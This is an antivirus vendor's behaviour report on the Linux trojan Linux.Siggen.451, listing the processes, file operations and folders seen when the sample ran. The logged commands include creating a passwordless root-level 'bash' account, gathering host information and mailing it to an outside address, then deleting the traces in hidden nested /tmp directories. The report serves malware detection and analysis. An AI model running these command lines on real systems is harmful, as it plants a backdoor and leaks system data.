Linux.Siggen.451
Added to the Dr.Web virus database:
2018-02-21
Virus description added:
2018-02-21
Technical Information
Malicious functions:
Gains root privileges
Launches itself as a daemon
Substitutes application name for:
Launches processes:
- /bin/sh <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/sh <SAMPLE_FULL_PATH> -c
- clear
- id -u
- sleep 3
- adduser -g 0 -u 0 -o bash
- passwd -d bash
- ifconfig
- uname -a
- uptime
- sshd
- cat /tmp/mama
- mail -s Inca o roata root@addlebrain.com
- /usr/sbin/sendmail send-mail -i -- root@addlebrain.com
- /usr/sbin/exim4 -Mc 1eoYkF-0000BG-4s
- rm -rf /tmp/mama
- mkdir -p /tmp/. /. /. /. /. /. /. /. /.
- sleep 1
- /usr/sbin/exim4 #-E1eoYkF-0000BG-4s
- /usr/sbin/exim4 -Mc 1eoYkG-0000BN-73
- sleep 2
- sleep 4
Performs operations with the file system:
Modifies file access rights:
- /var/spool/exim4/input/1eoYkF-0000BG-4s-D
- /var/spool/exim4/input/hdr.698
- /var/spool/exim4/msglog/1eoYkF-0000BG-4s
- /var/spool/exim4/input/1eoYkG-0000BN-73-D
- /var/spool/exim4/input/hdr.705
- /var/spool/exim4/input/hdr.700
- /var/spool/exim4/msglog/1eoYkG-0000BN-73
- /var/spool/exim4/input/1eoYkG-0000BN-73-J
- /var/mail/user
Creates folders:
- /tmp/.
- /tmp/. /.
- /tmp/. /. /.
- /tmp/. /. /. /.
- /tmp/. /. /. /. /.
- /tmp/. /. /. /. /. /.
- /tmp/. /. /. /. /. /. /.
- /tmp/. /. /. /. /. /. /. /.
- /tmp/. /. /. /. /. /. /. /. /.
Creates symlinks:
Creates or modifies files:
- /tmp/mama
- /tmp/mail.RsXXXXsG8HMd
- /tmp/mail.RsXXXXsG8HMd (deleted)
- /tmp/mail.RsXXXXA8h4No
- /tmp/mail.RsXXXXA8h4No (deleted)
- /var/spool/exim4/input//1eoYkF-0000BG-4s-D
- /var/spool/exim4/input/1eoYkF-0000BG-4s-D
- /var/spool/exim4/input//hdr.698
- /var/spool/exim4/input/hdr.698
- /var/spool/exim4/msglog//1eoYkF-0000BG-4s
- /var/spool/exim4/msglog/1eoYkF-0000BG-4s
- /var/log/exim4/mainlog
- /var/spool/exim4/db/retry.lockfile
- /var/spool/exim4/input//1eoYkG-0000BN-73-D
- /var/spool/exim4/input/1eoYkG-0000BN-73-D
- /var/spool/exim4/input//hdr.705
- /var/spool/exim4/input/hdr.705
- /var/spool/exim4/msglog//1eoYkG-0000BN-73
- /var/spool/exim4/msglog/1eoYkG-0000BN-73
- /var/spool/exim4/input//hdr.700
- /var/spool/exim4/input/hdr.700
- /var/spool/exim4/input//1eoYkG-0000BN-73-J
- /var/mail/user.lock.box-i386.5a8db48c.000002c6
- /var/mail/user
- /var/spool/exim4/input/1eoYkG-0000BN-73-J
Deletes files:
- /tmp/mail.RsXXXXsG8HMd"
- /tmp/mail.RsXXXXA8h4No"
- /tmp/mama"
- /var/spool/exim4/msglog//1eoYkF-0000BG-4s"
- /var/spool/exim4/input//1eoYkF-0000BG-4s-D"
- /var/spool/exim4/input//1eoYkF-0000BG-4s-H"
- /var/spool/exim4/input//1eoYkF-0000BG-4s-J"
- /var/mail/user.lock.box-i386.5a8db48c.000002c6"
- /var/mail/user.lock"
- /var/spool/exim4/msglog//1eoYkG-0000BN-73"
- /var/spool/exim4/input//1eoYkG-0000BN-73-D"
- /var/spool/exim4/input//1eoYkG-0000BN-73-H"
- /var/spool/exim4/input//1eoYkG-0000BN-73-J"
Network activity:
Establishes connection:
DNS ASK:
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
欢迎下载
Dr.Web for Android
-
免费3个月
-
可使用所有保护组件
-
可在AppGallery/Google Pay延期
继续使用此网站意味着您同意我们使用Cookie文件和其他用于收集网站访问统计信息的技术手段。详细信息